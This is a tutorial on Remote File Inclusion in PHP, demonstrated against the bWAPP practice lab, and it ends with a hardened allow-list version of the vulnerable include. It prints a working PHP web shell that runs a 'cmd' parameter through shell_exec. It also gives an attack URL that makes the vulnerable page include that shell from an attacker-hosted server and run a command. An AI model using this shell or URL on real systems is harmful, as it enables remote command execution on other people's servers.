Remote File Inclusion Attack – All things in moderation

Remote File Inclusion Attack

Introduction

Remote File Inclusion (RFI) is the inclusion of remote files by exploiting vulnerable inclusion procedures implemented in an application: the web application downloads and executes a remote file. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing an external URL to be injected. Although most examples point to vulnerable PHP scripts, keep in mind that it is also common in other technologies such as JSP, ASP and others.

Example Remote File Inclusion in PHP

For remote file inclusion to work, two options must be set in PHP’s configuration file “php.ini”: “allow_url_fopen=On” and “allow_url_include=On”.

  • allow_url_fopen: This option enables the URL-aware fopen wrappers that allow URL objects to be accessed like files. Default wrappers are provided for access to remote files using the ftp or http protocol; some extensions like zlib may register additional wrappers.

  • allow_url_include: This option allows the use of URL-aware fopen wrappers with the following functions: include, include_once, require, require_once.

Consider the following URL:
http://192.168.28.129/bWAPP/rlfi.php?language=lang_en.php&action=go

The value of the “language” parameter is passed to the following PHP code, and the file is included:

<?php

// Vulnerable: the request parameter reaches include() without any check.
$language = $_GET["language"];

include($language);

?>
 
  • Now you can set the value of the language parameter to a website on the internet.

Example: http://192.168.28.129/bWAPP/rlfi.php?language=http://hydrasky.com&action=go

The web application downloads the page http://hydrasky.com and passes it to the include() function. This means the RFI vulnerability is present!

  • Let's create a remote web shell to compromise the system: run shell commands, read files, write files … The file must not be executable on the remote server, because if the malicious file is executed on the remote server, the victim server will receive HTML content.

Example: http://192.168.28.1:8888/remote_shell.txt

<?php

$output = shell_exec($_GET["cmd"]);

echo "<pre> $output </pre>";

?> 

http://192.168.28.129/bWAPP/rlfi.php?language=http://192.168.28.1:8888/remote_shell.txt&action=go&cmd=ls -l
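
The vulnerable include shown earlier, rewritten in a hardened form. This is an added example, not part of the original post or of bWAPP's code. It assumes the language files live in a lang/ directory beside the script; lang_fr.php is a hypothetical second entry.

```php
<?php
// Added example: hardened replacement for include($_GET["language"]).
// Assumption: language files live in ./lang/ next to this script.
const LANG_DIR = __DIR__ . '/lang';

// Accepted parameter values mapped to fixed file names on disk.
// 'lang_en.php' is from the page; 'lang_fr.php' is a hypothetical entry.
const LANGUAGES = [
    'lang_en.php' => 'lang_en.php',
    'lang_fr.php' => 'lang_fr.php',
];

function resolve_language($requested): ?string
{
    // Exact-match lookup: URLs (http://, ftp://), stream wrappers and
    // traversal sequences can never equal a key, so they are rejected.
    // Non-string input such as language[]=x is rejected as well.
    if (!is_string($requested) || !array_key_exists($requested, LANGUAGES)) {
        return null;
    }
    $base = realpath(LANG_DIR);
    $path = realpath(LANG_DIR . '/' . LANGUAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // directory or file missing
    }
    // Defence in depth: the resolved path must stay inside LANG_DIR.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Fail closed if php.ini still permits URL includes.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('allow_url_include must be Off');
}

$file = resolve_language($_GET['language'] ?? '');
if ($file === null) {
    http_response_code(400);
    exit('Unknown language');
}
include $file;
```

With this in place, a request carrying language=http://... returns HTTP 400 and no remote content is fetched.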
